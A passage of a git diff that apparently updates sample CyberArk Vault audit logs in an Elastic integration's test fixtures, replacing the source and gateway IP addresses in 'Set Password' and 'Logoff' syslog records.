Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T09:11:55Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:55","IsoTimestamp":"2021-03-10T09:11:55Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMGw_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMGw_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-11T16:59:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:54\n 2021-03-11T16:59:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPApp_VAGRANT\n Set Password\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:54","IsoTimestamp":"2021-03-11T16:59:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-11T16:59:55Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:55\n 2021-03-11T16:59:55Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPGW_VAGRANT\n Set Password\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:55","IsoTimestamp":"2021-03-11T16:59:55Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-11T20:10:33Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:10:33\n 2021-03-11T20:10:33Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMApp_ASR-WIN\n Set Password\n \n \n \n \n 34.66.114.180\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:10:33","IsoTimestamp":"2021-03-11T20:10:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.66.114.180","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPGW_SSH\n Set Password\n \n \n \n \n 34.71.250.247\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_SSH","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPApp_SSH\n Set Password\n \n \n \n \n 34.71.250.247\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMP_ADB_asr-cyberark-psm-ssh\n Set Password\n \n \n \n \n 34.71.250.247\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMP_ADB_asr-cyberark-psm-ssh","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T09:11:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:52","IsoTimestamp":"2021-03-10T09:11:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T09:11:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:52","IsoTimestamp":"2021-03-10T09:11:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T09:11:55Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:55","IsoTimestamp":"2021-03-10T09:11:55Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMGw_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMGw_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-11T16:59:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:54\n 2021-03-11T16:59:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPApp_VAGRANT\n Set Password\n \n \n \n \n 67.43.156.13\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:54","IsoTimestamp":"2021-03-11T16:59:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-11T16:59:55Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:55\n 2021-03-11T16:59:55Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPGW_VAGRANT\n Set Password\n \n \n \n \n 67.43.156.13\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:55","IsoTimestamp":"2021-03-11T16:59:55Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-11T20:10:33Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:10:33\n 2021-03-11T20:10:33Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMApp_ASR-WIN\n Set Password\n \n \n \n \n 67.43.156.15\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:10:33","IsoTimestamp":"2021-03-11T20:10:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPGW_SSH\n Set Password\n \n \n \n \n 67.43.156.15\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_SSH","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPApp_SSH\n Set Password\n \n \n \n \n 67.43.156.15\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMP_ADB_asr-cyberark-psm-ssh\n Set Password\n \n \n \n \n 67.43.156.15\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMP_ADB_asr-cyberark-psm-ssh","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/8_logoff.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/8_logoff.log index 55eeab9c1a7..1fba00495ba 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/8_logoff.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/8_logoff.log @@ -4,12 +4,12 @@ <5>1 2021-03-10T08:28:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:28:29","IsoTimestamp":"2021-03-10T08:28:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Prov_COMPONENTS","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} <5>1 2021-03-10T08:28:30Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:28:30","IsoTimestamp":"2021-03-10T08:28:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PVWAGWUser","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} <5>1 2021-03-10T08:28:30Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:28:30","IsoTimestamp":"2021-03-10T08:28:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PVWAAppUser","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} -<5>1 2021-03-10T09:11:33Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:33","IsoTimestamp":"2021-03-10T09:11:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} -<5>1 2021-03-10T09:12:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:12:20","IsoTimestamp":"2021-03-10T09:12:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} -<5>1 2021-03-10T09:12:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:12:27","IsoTimestamp":"2021-03-10T09:12:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} -<5>1 2021-03-10T22:17:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:27","IsoTimestamp":"2021-03-10T22:17:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} -<5>1 2021-03-11T17:38:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:13\n 2021-03-11T17:38:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n Logoff\n 81.32.170.205\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:13","IsoTimestamp":"2021-03-11T17:38:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"81.32.170.205"}}} -<5>1 2021-03-11T17:48:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:28\n 2021-03-11T17:48:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 10.0.2.2\n \n \n \n \n \n Logoff\n 81.32.170.205\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:28","IsoTimestamp":"2021-03-11T17:48:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"81.32.170.205"}}} -<5>1 2021-03-11T17:49:06Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:49:06\n 2021-03-11T17:49:06Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n PSMPGW_VAGRANT\n Logoff\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Logoff\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:49:06","IsoTimestamp":"2021-03-11T17:49:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMPGW_VAGRANT","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} -<5>1 2021-03-14T12:57:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:20\n 2021-03-14T12:57:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 34.71.250.247\n \n \n \n \n \n Logoff\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:20","IsoTimestamp":"2021-03-14T12:57:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} -<5>1 2021-03-14T13:49:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:36\n 2021-03-14T13:49:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Logoff\n 34.71.250.247\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:36","IsoTimestamp":"2021-03-14T13:49:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"34.71.250.247"}}} +<5>1 2021-03-10T09:11:33Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:33","IsoTimestamp":"2021-03-10T09:11:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} +<5>1 2021-03-10T09:12:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:12:20","IsoTimestamp":"2021-03-10T09:12:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} +<5>1 2021-03-10T09:12:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:12:27","IsoTimestamp":"2021-03-10T09:12:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} +<5>1 2021-03-10T22:17:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:27","IsoTimestamp":"2021-03-10T22:17:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} +<5>1 2021-03-11T17:38:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:13\n 2021-03-11T17:38:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n Logoff\n 67.43.156.13\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 